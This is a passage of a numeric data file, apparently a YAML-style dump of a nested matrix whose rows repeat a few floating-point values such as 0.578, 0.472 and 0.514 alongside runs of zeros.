- 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, 